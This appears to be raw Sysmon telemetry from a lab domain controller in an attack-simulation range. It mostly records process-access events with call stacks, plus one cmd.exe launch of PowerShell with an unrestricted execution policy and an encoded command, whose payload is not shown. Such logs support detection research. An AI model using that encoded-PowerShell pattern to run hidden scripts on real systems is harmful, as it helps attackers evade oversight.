13:33:11.043{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E17-6005-B902-00000000A201}4616C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.027{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E17-6005-B902-00000000A201}4616C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.027{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E17-6005-B902-00000000A201}4616C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.037{59A5CD1D-8E17-6005-B902-00000000A201}4616C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8CA6-6005-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:10.965{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:10.965{59A5CD1D-8CA6-6005-0A00-00000000A201}860936C:\Windows\system32\services.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:09.824{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:09.824{59A5CD1D-8CA6-6005-0A00-00000000A201}8601124C:\Windows\system32\services.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:09.801{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8CA6-6005-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{59A5CD1D-8CA6-6005-0A00-00000000A201}860C:\Windows\System32\services.exeC:\Windows\system32\services.exe 434400x80000000000000002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local2021-01-18 13:33:11.121Started13.014.50 10341000x800000000000000092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.778{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.778{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.762{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.762{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.762{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.762{59A5CD1D-8E18-6005-BC02-00000000A201}46964448C:\Windows\system32\cmd.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.767{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E18-6005-BC02-00000000A201}4696C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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 10341000x800000000000000076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.762{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E18-6005-BC02-00000000A201}4696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
